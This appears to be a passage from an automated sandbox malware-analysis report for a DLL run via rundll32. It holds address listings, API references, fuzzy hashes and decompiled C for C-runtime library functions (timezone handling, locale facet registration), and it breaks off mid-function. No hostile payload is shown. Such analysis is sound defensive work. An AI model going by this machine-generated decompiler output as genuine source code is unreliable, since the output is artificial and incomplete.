                          0x6e24eafa
                          0x6e24eafd
                          0x6e24eb18
                          0x6e24eb1f
                          0x6e24eb25
                          0x6e24eb2b
                          0x6e24eaff
                          0x6e24eaff
                          0x6e24eb07
                          0x00000000
                          0x6e24eb09
                          0x6e24eb09
                          0x6e24eb0f
                          0x6e24eb0f
                          0x6e24eb07
                          0x6e24eb32
                          0x6e24eb35
                          0x6e24ec52
                          0x6e24ec55
                          0x6e24ec62
                          0x6e24ec65
                          0x6e24ec6d
                          0x6e24ec6d
                          0x6e24ec57
                          0x6e24ec5d
                          0x6e24ec5d
                          0x6e24eb3b
                          0x6e24eb3b
                          0x6e24eb41
                          0x6e24eb49
                          0x6e24eb4b
                          0x6e24eb4e
                          0x6e24eb57
                          0x6e24eb60
                          0x6e24eb66
                          0x6e24eb66
                          0x6e24eb69
                          0x6e24eb6b
                          0x00000000
                          0x00000000
                          0x6e24eb6d
                          0x6e24eb73
                          0x6e24eb74
                          0x6e24eb7f
                          0x6e24eb87
                          0x6e24eb8f
                          0x6e24eb92
                          0x6e24eb95
                          0x6e24eb9b
                          0x6e24eba1
                          0x6e24eba7
                          0x6e24ebad
                          0x6e24ebb0
                          0x00000000
                          0x00000000
                          0x6e24ebb2
                          0x6e24ebd7
                          0x6e24ebd7
                          0x6e24ebda
                          0x6e24ebde
                          0x6e24ebf7
                          0x6e24ebfc
                          0x6e24ebff
                          0x6e24ec01
                          0x6e24ec07
                          0x6e24ec42
                          0x6e24ec09
                          0x6e24ec09
                          0x6e24ec0e
                          0x6e24ec16
                          0x6e24ec17
                          0x6e24ec17
                          0x6e24ec2e
                          0x6e24ec35
                          0x6e24ec38
                          0x6e24ec3d
                          0x6e24ec3d
                          0x6e24ec45
                          0x6e24ec48
                          0x6e24ec48
                          0x6e24ec4d
                          0x00000000
                          0x6e24ec4d
                          0x6e24ebb4
                          0x6e24ebb6
                          0x6e24ebbb
                          0x6e24ebc1
                          0x6e24ebca
                          0x6e24ebd3
                          0x6e24ebd3
                          0x00000000
                          0x6e24ebb6
                          0x6e24ec70
                          0x6e24ec70
                          0x6e24ec74
                          0x6e24ec7c
                          0x6e24ec82
                          0x6e24ec85
                          0x6e24ec8b
                          0x6e24ec8d
                          0x6e24eccd
                          0x6e24ecd3
                          0x6e24ecda
                          0x6e24ecda
                          0x6e24ece0
                          0x6e24ece4
                          0x00000000
                          0x6e24ece6
                          0x6e24ece6
                          0x6e24ecea
                          0x6e24ecef
                          0x6e24ecf3
                          0x6e24ecf8
                          0x6e24ecff
                          0x6e24ed0d
                          0x6e24ed13
                          0x6e24ed16
                          0x6e24ed16
                          0x6e24ece4
                          0x6e24ed25
                          0x6e24ed2d
                          0x6e24ed36
                          0x6e24ec8f
                          0x6e24ec95
                          0x6e24ec98
                          0x6e24ec9f
                          0x6e24ecb1
                          0x6e24ecb8
                          0x6e24ecc5
                          0x00000000
                          0x6e24ecc5
                          0x00000000
                          0x6e24ec8d
                          0x6e24eae6
                          0x6e24ea61
                          0x00000000
                          0x6e24ea61
                          0x00000000
                          0x6e24ea5f
                          0x6e24ea58
                          0x6e24ea5a
                          0x6e24ea5a
                          0x00000000
                          0x6e24e9e4
                          0x6e24e9e4
                          0x6e24e9e6
                          0x6e24e9ea
                          0x6e24e9f6
                          0x6e24e9f6
                          0x00000000

                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,F9AC1F88), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,F9AC1F88), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                          • _memcmp.LIBVCRUNTIME ref: 6E24EC2E
                          • _free.LIBCMT ref: 6E24EC9F
                          • _free.LIBCMT ref: 6E24ECB8
                          • _free.LIBCMT ref: 6E24ECEA
                          • _free.LIBCMT ref: 6E24ECF3
                          • _free.LIBCMT ref: 6E24ECFF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorLast$_abort_memcmp
                          • String ID: C
                          • API String ID: 1679612858-1037565863
                          • Opcode ID: ffcb3fdd909ed01bde7a74dde87d718c4c4222fa5f085a5d8ecdd5b1983ef91f
                          • Instruction ID: b1b15a0b1200166e04248ea529bcf5a4c7a177af09dd3a0eb513ee286b4b1cfc
                          • Opcode Fuzzy Hash: ffcb3fdd909ed01bde7a74dde87d718c4c4222fa5f085a5d8ecdd5b1983ef91f
                          • Instruction Fuzzy Hash: 56C15D7590121EDFEB68DF58C888A9DB7B6FF49704F1045AAD94AAB350D731AE80CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E258951, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171timeCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E6E258951(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				void* _t87;
				signed int _t88;
				signed int _t90;
				int _t94;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t89 = __edi;
				_t96 = E6E25822B();
				_t1 =  &_v8; // 0x6e272130
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E6E258289(_t1);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E242188();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x6e2c506c; // 0x5cc08226
					_v56 = _t38 ^ _t106;
					 *0x6e2c5384 =  *0x6e2c5384 | 0xffffffff;
					 *0x6e2c5378 =  *0x6e2c5378 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t90 = 0;
					 *0x6e2c7a10 = 0;
					_t42 = E6E251216(0x6e272130, _t87, 0, __eflags,  &_v316,  &_v312, 0x100, 0x6e272130);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E6E24F26D(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E6E251216(0x6e272130, _t87, 0, __eflags,  &_v276, _t101, _v272, 0x6e272130);
								__eflags = _t50;
								if(_t50 == 0) {
									E6E24CBD3(0);
									_t90 = _t101;
								} else {
									_push(_t101);
									goto L26;
								}
							} else {
								_push(0);
								L26:
								E6E24CBD3();
							}
						}
					} else {
						_t90 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t90 -  &_v268) & _t90;
					__eflags = _t90;
					if(__eflags == 0) {
						L34:
						E6E258951(0x6e272130, _t90, __eflags);
					} else {
						__eflags =  *_t90;
						if(__eflags == 0) {
							goto L34;
						} else {
							_push(_t90);
							E6E25877C(0x6e272130, _t90, __eflags);
						}
					}
					E6E24CBD3(_t100);
					__eflags = _v12 ^ _t106;
					return E6E21F8A5(_v12 ^ _t106, _t87, _t100);
				} else {
					_t54 = E6E258231( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E6E25825D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E6E24CBD3( *0x6e2c7a08);
							 *0x6e2c7a08 = 0;
							 *_t107 = 0x6e2c7a18;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x6e2c7a18 * 0x3c;
								_t88 =  *0x6e2c7a6c; // 0x0
								_push(__edi);
								 *0x6e2c7a10 = 1;
								_v8 = _t85;
								_t116 =  *0x6e2c7a5e; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t88 * 0x3c;
								}
								_t118 =  *0x6e2c7ab2; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x6e2c7ac0; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t88) * 0x3c;
									}
								}
								_t94 = E6E243CD0(0, _t88);
								if(WideCharToMultiByte(_t94, 0, 0x6e2c7a1c, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t94, 0, 0x6e2c7a70, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E6E258225()) = _v8;
							 *(E6E258219()) = _v12;
							_t61 = E6E25821F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}




































                          0x6e258951
                          0x6e258960
                          0x6e258964
                          0x6e258967
                          0x6e25896b
                          0x6e25896e
                          0x6e258971
                          0x6e258976
                          0x6e258979
                          0x6e258aa1
                          0x6e258aa1
                          0x6e258aa2
                          0x6e258aa3
                          0x6e258aa4
                          0x6e258aa5
                          0x6e258aa6
                          0x6e258aab
                          0x6e258aaf
                          0x6e258ab7
                          0x6e258abe
                          0x6e258ac1
                          0x6e258ace
                          0x6e258ad5
                          0x6e258ad6
                          0x6e258add
                          0x6e258aec
                          0x6e258af3
                          0x6e258afb
                          0x6e258afd
                          0x6e258b07
                          0x6e258b0a
                          0x6e258b17
                          0x6e258b1a
                          0x6e258b1c
                          0x6e258b35
                          0x6e258b3d
                          0x6e258b3f
                          0x6e258b45
                          0x6e258b4a
                          0x6e258b41
                          0x6e258b41
                          0x00000000
                          0x6e258b41
                          0x6e258b1e
                          0x6e258b1e
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b4c
                          0x6e258aff
                          0x6e258aff
                          0x6e258aff
                          0x6e258b59
                          0x6e258b5b
                          0x6e258b5d
                          0x6e258b5f
                          0x6e258b6f
                          0x6e258b6f
                          0x6e258b61
                          0x6e258b61
                          0x6e258b64
                          0x00000000
                          0x6e258b66
                          0x6e258b66
                          0x6e258b67
                          0x6e258b6c
                          0x6e258b64
                          0x6e258b75
                          0x6e258b80
                          0x6e258b8b
                          0x6e25897f
                          0x6e258983
                          0x6e258988
                          0x6e25898b
                          0x00000000
                          0x6e258991
                          0x6e258995
                          0x6e25899a
                          0x6e25899d
                          0x00000000
                          0x6e2589a3
                          0x6e2589a9
                          0x6e2589ae
                          0x6e2589b4
                          0x6e2589c4
                          0x6e2589ca
                          0x6e2589d1
                          0x6e2589d7
                          0x6e2589db
                          0x6e2589e1
                          0x6e2589e4
                          0x6e2589eb
                          0x6e2589f2
                          0x6e2589f2
                          0x6e2589f5
                          0x6e2589fc
                          0x6e258a14
                          0x6e258a14
                          0x6e258a17
                          0x6e2589fe
                          0x6e2589fe
                          0x6e258a05
                          0x00000000
                          0x6e258a07
                          0x6e258a09
                          0x6e258a0f
                          0x6e258a0f
                          0x6e258a05
                          0x6e258a1f
                          0x6e258a3b
                          0x6e258a4b
                          0x6e258a42
                          0x6e258a44
                          0x6e258a44
                          0x6e258a69
                          0x6e258a7b
                          0x6e258a70
                          0x6e258a73
                          0x6e258a73
                          0x6e258a69
                          0x6e258a85
                          0x6e258a8f
                          0x6e258a94
                          0x6e258a99
                          0x6e258aa0
                          0x6e258aa0
                          0x6e25899d
                          0x6e25898b

                          APIs
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60
                          • _free.LIBCMT ref: 6E2589A9
                            • Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
                            • Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB
                          • _free.LIBCMT ref: 6E258B75
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                          • String ID: 0!'n$0!'n
                          • API String ID: 1286116820-1210743812
                          • Opcode ID: 0e957e57a3366cc4c98d139204c32eb19a9813d234304db0f231b67da4120158
                          • Instruction ID: d25bdfec5466c19293491472b3e610894336dc36d7c6d903214690091bb99764
                          • Opcode Fuzzy Hash: 0e957e57a3366cc4c98d139204c32eb19a9813d234304db0f231b67da4120158
                          • Instruction Fuzzy Hash: 1A51D77181061EEFDB48DFF9CD449AAB7BFAB41710B100A7AE411E7390D7B09A50CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20FC89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E6E20FC89(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t66 - 0x14, 0);
				_t63 =  *0x6e2c6dd0; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6E1E161C(0x6e2c6d60);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6E1E171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6E2066BA(_t66 - 0x14);
					return E6E220075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6E21162A(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6E1E1438(_t55);
							E6E223D74(_t66 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e26851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6e26c0c4;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6E21542F(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6E220075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6E206FD3(__eflags, _t61);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6e2c6dd0 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}









                          0x6e20fc89
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcba
                          0x6e20fcbf
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20FC90
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FC9A
                          • int.LIBCPMT ref: 6E20FCB1
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20FCEB
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FD0B
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FD29
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: `m,n
                          • API String ID: 651022567-3377878941
                          • Opcode ID: b8176df5bdaca437d0319d6bb8f3d0561bc381a7c0f6f2cafa9f5a949311f6f6
                          • Instruction ID: 70e9a397f8daf559b16a6cef501db3e2e9ae6d66d710fdfc6a7615a233d05766
                          • Opcode Fuzzy Hash: b8176df5bdaca437d0319d6bb8f3d0561bc381a7c0f6f2cafa9f5a949311f6f6
                          • Instruction Fuzzy Hash: CE11067590052DCBCF00EBE0CC94AEEB77BBF45714F240908E4106B2D0DBB49A44C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21BB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E6E21BB30(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t110 - 0x14, 0);
				_t105 =  *0x6e2c6e40; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6E1E161C(0x6e2c6e20);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6E1E171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6E2066BA(_t110 - 0x14);
					return E6E220075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6E21C229(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t110 - 0x20);
							E6E223D74(_t110 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t102, _t105, 0x14);
							E6E206653(_t110 - 0x14, 0);
							_t106 =  *0x6e2c6e44; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6E1E161C(0x6e2c6e24);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6E1E171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6E2066BA(_t110 - 0x14);
								return E6E220075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6E21C295(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6E1E1438(_t93);
										E6E223D74(_t110 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e26851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6e26c414;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6E21D028(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6E220075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6E206FD3(__eflags, _t103);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6e2c6e44 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6E206FD3(__eflags, _t102);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6e2c6e40 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}












                          0x6e21bb30
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb61
                          0x6e21bb66
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21BB37
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21BB41
                          • int.LIBCPMT ref: 6E21BB58
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E21BB92
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BBB2
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21BBD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: n,n
                          • API String ID: 651022567-1342484985
                          • Opcode ID: 3fbef3bfdbbb79f7d8789ad5d990f5b111c051b872b6de22f359d1a50de2a0ca
                          • Instruction ID: 5837456fd597e2c1d6db6faa0fd0dad6903885155175de41ff1d125d22556f3b
                          • Opcode Fuzzy Hash: 3fbef3bfdbbb79f7d8789ad5d990f5b111c051b872b6de22f359d1a50de2a0ca
                          • Instruction Fuzzy Hash: E7110E79A0051ECBCF00EBE0C894AEDB7BBAF44B14F100919E511AB3D0DBB49B40C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21BBD6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E6E21BBD6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t66 - 0x14, 0);
				_t63 =  *0x6e2c6e44; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6E1E161C(0x6e2c6e24);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6E1E171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6E2066BA(_t66 - 0x14);
					return E6E220075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6E21C295(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6E1E1438(_t55);
							E6E223D74(_t66 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e26851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
